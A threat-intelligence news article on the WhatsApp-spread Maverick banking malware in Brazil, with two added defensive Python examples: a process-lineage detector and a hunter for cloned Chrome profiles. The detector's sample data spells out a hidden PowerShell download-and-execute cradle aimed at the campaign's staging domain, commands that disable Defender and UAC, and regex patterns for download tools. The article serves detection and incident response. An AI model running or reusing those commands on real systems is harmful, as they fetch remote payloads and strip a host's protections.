WhatsApp malware ‘Maverick’ hijacks browser sessions and targets Brazil’s largest banks

November 11, 2025
Threat hunters have identified similarities between the Coyote banking malware and a newly identified malicious program called Maverick that is propagated via WhatsApp.

According to a report by CyberProof, both malware families are written in .NET, target users and banks in Brazil, and share identical functionality for decrypting the list of targeted bank URLs and monitoring banking applications. More importantly, both include the ability to spread through WhatsApp Web.

Maverick was first documented by Trend Micro early last month and attributed to a threat actor tracked as Water Saci. The campaign has two components: a self-propagating piece of malware called SORVEPOTEL, which spreads through the desktop web version of WhatsApp and delivers ZIP archives, and the Maverick banking payload carried inside those archives.

Maverick monitors the active browser window and its tabs for URLs that match a hardcoded list of Latin American financial institutions. Once a URL matches, it establishes a connection to a remote server, fetches follow-on commands to collect system information, and serves a phishing page to steal credentials.

In a subsequent report, cybersecurity firm Sophos first raised the possibility that this activity is related to a previously reported campaign that spread Coyote to users in Brazil, and asked whether Maverick is an evolved version of Coyote. A separate Kaspersky analysis found that Maverick does share a substantial amount of code with Coyote, but noted that Maverick is being treated as an entirely new threat targeting Brazil altogether.

CyberProof’s latest findings show that the ZIP file contains a Windows shortcut (LNK) that, when launched by the user, runs cmd.exe or PowerShell to connect to an external server (‘zapgrande(.)com’) and download the first-stage payload. The PowerShell scripts then launch intermediate tools designed to disable Microsoft Defender Antivirus and User Account Control (UAC), or retrieve the .NET loader.


The loader includes anti-analysis checks that look for reverse engineering tools and self-terminate if one is found. The loader then downloads the attack’s main modules, SORVEPOTEL and Maverick. Notably, Maverick installs only after confirming that the victim is located in Brazil by checking the infected host’s time zone, language, region, and date and time format.
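The LNK-to-PowerShell chain described above leaves a distinctive process lineage on the endpoint: explorer.exe spawns cmd.exe or powershell.exe with a download cradle on the command line, and the children of that process then tamper with Defender and UAC. The following is an added detection example written for this page, not code from CyberProof or Trend Micro. It runs rules over constructed Sysmon-style process-creation records; the process ids, paths and the benign events are made up, and the indicator strings (download primitives, Set-MpPreference, the EnableLUA registry value) are generic PowerShell and registry tampering patterns chosen by the editor rather than indicators taken from the report. zapgrande.com is the staging domain named above, refanged.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (the fields Sysmon event ID 1 carries)."""
    pid: int
    ppid: int
    image: str          # path of the created process
    parent_image: str   # path of the parent process
    cmdline: str


SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Generic remote-download primitives (assumed indicators, not from the report).
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b"
    r"|start-bitstransfer|bitsadmin|certutil.+-urlcache", re.I)
REMOTE_HOST = re.compile(r"https?://([\w.-]+)", re.I)
# Defender real-time protection / exclusion tampering and the UAC registry kill switch.
DEFENDER_TAMPER = re.compile(
    r"set-mppreference\s+-disable\w+|add-mppreference\s+-exclusion\w+", re.I)
UAC_TAMPER = re.compile(r"enablelua\b.*?/d\s+0\b", re.I)


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(events):
    """Return {pid: [tags]} for every event that trips a rule.

    Lineage matters: an LNK double-clicked in Explorer makes explorer.exe the
    parent of cmd.exe/powershell.exe, and anything a flagged process spawns
    inherits the suspicion even when its own command line looks clean.
    """
    flagged = {}
    for ev in events:
        tags = []
        img, parent = _name(ev.image), _name(ev.parent_image)
        if img in SCRIPT_HOSTS and parent == "explorer.exe" and DOWNLOAD_CRADLE.search(ev.cmdline):
            m = REMOTE_HOST.search(ev.cmdline)
            tags.append("lnk_download_cradle:" + (m.group(1).lower() if m else "?"))
        if img in SCRIPT_HOSTS and DEFENDER_TAMPER.search(ev.cmdline):
            tags.append("defender_tamper")
        if UAC_TAMPER.search(ev.cmdline):
            tags.append("uac_tamper")
        if ev.ppid in flagged:
            tags.append(f"child_of_flagged:{ev.ppid}")
        if tags:
            flagged[ev.pid] = tags
    return flagged


# Constructed telemetry for one victim session (pids and paths are made up).
EXPLORER = r"C:\Windows\explorer.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString('https://zapgrande.com/p1')\""
SAMPLE_EVENTS = [
    ProcEvent(4100, 1200, CMD, EXPLORER, "cmd.exe /c " + CRADLE),             # LNK target
    ProcEvent(4120, 4100, PS, CMD, CRADLE),                                    # first stage
    ProcEvent(4130, 4120, PS, PS,
              r'powershell -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true; '
              r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System '
              r'/v EnableLUA /t REG_DWORD /d 0 /f"'),                         # tampering
    ProcEvent(5000, 1200, PS, EXPLORER, r'powershell -c "Get-ChildItem C:\Users\ana\Documents"'),  # benign
    ProcEvent(5100, 3300, PS, r"C:\Program Files\Vendor\Updater.exe",
              'powershell -c "Invoke-WebRequest https://updates.vendor.example/m.json -OutFile m.json"'),  # benign
]

if __name__ == "__main__":
    for pid, tags in analyze(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

The parent check is what keeps the updater's legitimate Invoke-WebRequest out of the results; an LNK launched from Explorer, a mail client or a browser download would need its own parent list, and the tamper rules fire regardless of parent because they are rarely benign on a workstation.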

CyberProof said it also found evidence of the malware being used against hotels in Brazil, suggesting its targeting could expand beyond banking.

The disclosure comes as Trend Micro details a new Water Saci attack chain that employs email-based command-and-control (C2) infrastructure, relies on multi-vector persistence for resiliency, and incorporates several checks to evade detection, improve operational stealth, and limit execution to Portuguese-language systems.

“The new attack chain also features advanced remote command and control systems that allow attackers real-time management, including pausing, resuming, and monitoring malware campaigns, effectively turning infected machines into botnet tools that can be operated collaboratively and dynamically across multiple endpoints,” the cybersecurity firm said in a report released late last month.

New Water Saci attack chain observed

This infection sequence avoids .NET binaries and instead uses Visual Basic Script (VBScript) and PowerShell to hijack WhatsApp browser sessions and spread ZIP files via the messaging app. As in previous attack chains, the WhatsApp Web hijacking is performed by downloading ChromeDriver and Selenium for browser automation.

The attack is triggered when a user downloads and unzips a ZIP archive containing an obfuscated VBS downloader (‘Orcamento.vbs’, aka SORVEPOTEL) that issues PowerShell commands to download a PowerShell script (‘tadeu.ps1’) and execute it directly in memory.


This PowerShell script takes control of the victim’s WhatsApp Web session and distributes a malicious ZIP file to every contact associated with the account, while displaying a decoy banner titled “WhatsApp Automation v6.0” to mask its purpose. The script also connects to the C2 server to retrieve message templates and to upload the extracted contact list.

“After terminating existing Chrome processes and clearing old sessions to ensure clean operation, the malware copies the victim’s legitimate Chrome profile data to a temporary workspace,” Trend Micro said. “This data includes cookies, authentication tokens, and saved browser sessions.”

Water Saci Campaign Timeline

“This technique allows the malware to completely bypass WhatsApp Web authentication and instantly gain access to the victim’s WhatsApp account without raising any security alerts or requiring QR code scanning.”

The malware also implements remote control mechanisms that let the attackers pause, resume, and monitor WhatsApp propagation in real time, effectively turning compromised hosts into bots they can direct, the cybersecurity firm added.
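The profile-copy step Trend Micro describes above means that the session material never leaves the disk: the malware only needs a second copy of Chrome’s user-data directory under a path it controls. That copy is also the artifact an incident responder can hunt for. The following is an added example written for this page, not code from Trend Micro or the project it describes. It walks a directory tree for Chrome user-data roots that sit outside the canonical location and lists the session-bearing artifacts each profile holds; the tree is constructed in a temporary directory, the user name and the Temp subfolder are assumptions, and the file and folder names are Chrome’s real on-disk layout.

```python
import os
import tempfile

# Chrome's on-disk layout: "Local State" marks a user-data root, "Preferences"
# marks a profile, and these artifacts inside a profile carry session state
# (newer Chrome keeps the cookie store under Network\Cookies).
ROOT_MARKER = "Local State"
PROFILE_MARKER = "Preferences"
SESSION_ARTIFACTS = (
    "Cookies", os.path.join("Network", "Cookies"), "Login Data",
    os.path.join("Local Storage", "leveldb"), "IndexedDB", "Session Storage",
)


def profiles_in(user_data_dir):
    """Names of profile directories (those holding a Preferences file)."""
    return sorted(d for d in os.listdir(user_data_dir)
                  if os.path.isfile(os.path.join(user_data_dir, d, PROFILE_MARKER)))


def is_user_data_root(path):
    return os.path.isfile(os.path.join(path, ROOT_MARKER)) and bool(profiles_in(path))


def session_artifacts(profile_dir):
    return [a for a in SESSION_ARTIFACTS if os.path.exists(os.path.join(profile_dir, a))]


def find_profile_clones(search_roots, canonical_roots):
    """Walk search_roots and report every Chrome user-data root that is not
    under a canonical location, with the session artifacts each profile holds.
    Returns [(user_data_path, {profile_name: [artifacts]})]."""
    canon = [os.path.normcase(os.path.abspath(c)) for c in canonical_roots]
    findings = []
    for root in search_roots:
        for dirpath, dirnames, _ in os.walk(root):
            if not is_user_data_root(dirpath):
                continue
            dirnames[:] = []        # a root was found; no need to descend into it
            full = os.path.normcase(os.path.abspath(dirpath))
            if any(full == c or full.startswith(c + os.sep) for c in canon):
                continue
            findings.append((dirpath, {p: session_artifacts(os.path.join(dirpath, p))
                                       for p in profiles_in(dirpath)}))
    return findings


def _touch(path):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    open(path, "a").close()


def build_sample_tree(base):
    """Constructed layout: the real profile under LocalAppData plus a copy
    staged under Temp. Returns (canonical_root, clone_root)."""
    local = os.path.join(base, "Users", "ana", "AppData", "Local")
    canonical = os.path.join(local, "Google", "Chrome", "User Data")
    clone = os.path.join(local, "Temp", "wa_work", "User Data")
    for ud in (canonical, clone):
        _touch(os.path.join(ud, ROOT_MARKER))
        prof = os.path.join(ud, "Default")
        _touch(os.path.join(prof, PROFILE_MARKER))
        _touch(os.path.join(prof, "Network", "Cookies"))
        _touch(os.path.join(prof, "Login Data"))
        os.makedirs(os.path.join(prof, "Local Storage", "leveldb"))
        os.makedirs(os.path.join(prof, "IndexedDB"))
    _touch(os.path.join(local, "Temp", "notes", PROFILE_MARKER))   # stray file, not a profile
    return canonical, clone


def run_demo():
    """Build the sample tree in a temp dir and hunt it; returns the findings
    with paths made relative to the temp dir."""
    with tempfile.TemporaryDirectory() as base:
        canonical, _ = build_sample_tree(base)
        hits = find_profile_clones([os.path.join(base, "Users")], [canonical])
        return [(os.path.relpath(path, base), profiles) for path, profiles in hits]


if __name__ == "__main__":
    for path, profiles in run_demo():
        print(path)
        for name, arts in profiles.items():
            print("  ", name, "->", ", ".join(arts))
```

On a real host the canonical roots are the per-user `%LOCALAPPDATA%\Google\Chrome\User Data` paths (and the equivalents for Edge, Brave and other Chromium builds), and the search roots are the user profile directories; a hit with cookies and local storage present is a complete, reusable session, regardless of what the attacker eventually did with it.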

As for how the ZIP archive is actually distributed, the PowerShell code iterates through all collected contacts, replaces placeholders in the message template with a time-of-day greeting and the contact’s name, and checks for a pause command before sending each personalized message.

Another notable aspect of SORVEPOTEL is that, rather than using traditional HTTP-based communication, it retrieves commands over an IMAP connection to a terra.com(.)br email account, using hard-coded email credentials. Some of these accounts are protected with multi-factor authentication (MFA) to prevent unauthorized access.

This added layer of security is said to have caused operational delays, as the attackers had to manually enter a one-time authentication code at each login to access the inbox and store the C2 server URL used to issue commands. The backdoor then periodically polls the C2 server for instructions. The supported commands are:

  • INFO: collects detailed system information
  • CMD: executes a command via cmd.exe and writes the result to a temporary file
  • POWERSHELL: runs a PowerShell command
  • SCREENSHOT: takes a screenshot
  • TASKLIST: enumerates all running processes
  • KILL: terminates a specific process
  • LIST_FILES: enumerates files and folders
  • DOWNLOAD_FILE: downloads a file from the infected system
  • UPLOAD_FILE: uploads a file to the infected system
  • DELETE: deletes a specific file or folder
  • RENAME: renames a file or folder
  • COPY: copies a file or folder
  • MOVE: moves a file or folder
  • FILE_INFO: gets detailed metadata about a file
  • SEARCH: recursively searches for files matching a specified pattern
  • CREATE_FOLDER: creates a folder
  • REBOOT: initiates a system reboot with a 30-second delay
  • SHUTDOWN: initiates a system shutdown with a 30-second delay
  • UPDATE: downloads and installs an updated version of itself
  • CHECK_EMAIL: checks the attacker-controlled mailbox for new C2 URLs

The campaign’s reach is driven by the popularity of WhatsApp in Brazil, where the app has more than 148 million active users, making the country its second-largest market after India.

Trend Micro said that “the evolution of infection methods and ongoing tactics, as well as regionally focused targeting, indicate that Water Saci is likely associated with Coyote, with both campaigns operating within the same Brazilian cybercrime ecosystem,” and that the attackers are aggressive in “quantity and quality.”

“Coupling the Water Saci campaign with Coyote provides a picture of a major shift in how banking Trojans propagate. Threat actors are moving from relying on traditional payloads to exploiting legitimate browser profiles and messaging platforms for stealthy, scalable attacks.”
